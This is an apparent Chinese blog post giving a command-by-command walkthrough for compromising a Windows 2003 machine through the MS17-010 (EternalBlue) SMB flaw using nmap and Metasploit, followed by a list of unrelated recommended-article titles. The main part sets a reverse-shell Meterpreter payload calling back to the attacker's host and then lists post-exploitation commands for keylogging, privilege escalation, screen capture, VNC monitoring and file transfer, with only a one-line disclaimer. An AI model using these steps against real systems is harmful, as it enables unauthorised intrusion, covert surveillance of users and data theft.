入侵漏洞：ms17_010

请勿用于非法用途

第一步:

发现存活主机

nmap -sn 192.168.1.0/24

第二步:

扫描漏洞

nmap -T4 --script vuln 192.168.0.107

扫描到漏洞smb-vuln-ms17-010(永恒之蓝)

第三步:

打开metasploit

msfconsole

第四步:

查找ms17-010漏洞

search ms17-010

选择漏洞模块

win2003/winxp版本选用:exploit/windows/smb/ms17_010_psexec

win7/win2008选用: exploit/windows/smb/ms17_010_eternalblue

win8/win8.1选用:exploit/windows/smb/ms17_010_eternalblue_win8

这里是win2003所以输入

use exploit/windows/smb/ms17_010_psexec

查看模块属性

show options

设置目标ip

set rhosts 192.168.0.107

设置载块

set payload windows/meterpreter/reverse_tcp

设置自己的主机ip

set lhost 192.168.0.105

查看属性

show options

开始渗透

exploit

第五步:

现在已经得到了meterpreter的回话

打开vnc屏幕监控

run vnc

其他命令:

screenshot                #屏幕截图

shell                         #打开目标cmd

keyscan_start             #开启键盘监听

keyscan_dump             #查看监听记录

keyscan_stop               #停止监听

getsystem                     #提权

upload a.exe  c:/            #上传文件到c:/

download c:/a.exe /root  #下载文件到root目录

ps                                #查看进程

kill 2312                        #关闭pid为2312的进程

kali metsploit 工具入侵windows相关推荐

1. kali入侵windows

   因为我是一个爱好和平的人(捂嘴笑),所以就在虚拟机中,创建二个系统,一个kali,一个windows xp,来进行这次入侵实验,以此迈入hacke的大门. ####实验环境 ![实验环境.jpg](h ...

2. Kali社会工程学套件入侵Windows

   通过Kali系统自带的社会工程学套件制作基于Windows系统的恶意感染设备(SET.MSF.INF文件利用) MSFconsole一款不错的入侵渗透环境可以通过制作木马或者是漏洞利用去入侵计算机系统 ...

3. kali linux关闭进程,技术|如何使用 Kali Linux 黑掉 Windows

   Kali Linux 派生自 Debian Linux,主要用于渗透测试,拥有超过 300 个的预安装好的渗透测试工具.Metasploit 项目中 Metasploit 框架支持 Kali Linu ...

4. 网络安全-木马入侵windows -msfvenom反弹shell（CMD）

   网络安全-木马入侵windows -msfvenom反弹shell(CMD) 前言 一,我也是初学者记录的笔记 二,可能有错误的地方,请谨慎 三,欢迎各路大神指教 四,任何文章仅作为学习使用 五,学习 ...

5. Kali利用msf渗透Windows电脑（超详细）

   Kali利用msfvenom渗透Windows电脑 一.什么是msf 演示环境 二.渗透流程 1.进入管理员模式 2.生成可执行文件 3.运行msfconsole命令 4.配置参数 5.在靶机打开可执 ...

6. Kali利用MSF入侵安卓手机

   kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...

7. 网络安全学习小结--kali基本工具、webshell、代码审计

   0x00 kali基础工具使用 sqlmap sql注入 #基本命令get型 sqlmap -u "URL" --dbs sqlmap -u "URL" -D ...

8. 网安入门必备的12个kali Linux工具

   kali Linux工具帮你评估 Web 服务器的安全性,并帮助你执行黑客渗透测试. 注意:这里不是所提及的所有工具都是开源的. 1. Nmap Nmap ( 网络映射器 )是一款用于 网络发现 和 ...

9. Synergy工具 共享Windows系统电脑Linux系统电脑 鼠标键盘

   Synergy工具 共享Windows系统电脑Linux系统电脑 鼠标键盘 相关软件相关文章发表评论 来源:西西整理时间:2014/11/6 15:03:11字体大小:A-A+ 作者:西西点击:24评 ...

10. 如何在redhat8里使用gcc命令_如何使用DISM命令行工具修复Windows 10映像

    Windows 10 中内置了一个被称为 DISM 的「部署映像服务和管理」命令行工具,该工具从 Windows 8 便开始内置,直到 Windows 10. DISM 命令行工具可用于修复和准备 W ...

最新文章

1. 大佬是怎么优雅实现矩阵乘法的？
2. GOCN每日新闻(2017-08-12)
3. numpy(7)-广播
4. ASP.NET Core MVC 控制器创建与依赖注入
5. IDEA自动生成 构造方法 get set方法
6. python面向对象的特征_03 Python 关键点讲解：面向对象的机制
7. Win10如何卸载自己安装的软件
8. Audio Jungle宣传专题片头音乐AE模板专用配乐合集-永久更新
9. DayDayUp：罗振宇—2018.12.31年终秀——《时间的朋友》跨年演讲重点概览【文字+视频】
10. 全球与中国多模连续光纤激光器市场现状及未来发展趋势
11. 下列哪个不是python的第三方库_以下选项中，不是 Python 中用于开发用户界面的第三方库是（）...
12. 二代征信报告解读及信贷风控中的应用
13. 【乐器常识】声音之美
14. 换发型算法_【AI超级美发师】深度学习算法打造染发特效（附代码）
15. 2019年12月7日PAT甲级满分题解与经验总结
16. 量子统计：玻尔兹曼分布、玻色分布、费米分布
17. 番茄工作法基础操作手册
18. Substrate框架：平行链及跨链技术简析 结合ETH和IPFS能否成为第一跨链系统？
19. 关闭联通游戏代扣费的功能
20. 100种送给老婆的生日礼物，看看有没有你需要的！

热门文章

1. java 图片添加水印
2. 信息安全-应用安全-SAST、DAST、IAST
3. java jbutton数组_java-JButton需要显示图像数组
4. 使用itext7统计PDF文件中的字数
5. doc 问卷调查模板表_问卷调查Word模板.doc
6. VXLAN技术产生背景
7. JAVA毕业设计飞羽羽毛球馆管理系统计算机源码+lw文档+系统+调试部署+数据库
8. java漫画pdf_Java并发编程学习宝典（漫画版）(PDF+HTML完结)
9. 电路图符号科普、整流电路、稳压电路、放大电路及调幅与检波电路和常见的基本电路
10. 离散数学主析取及主合取范式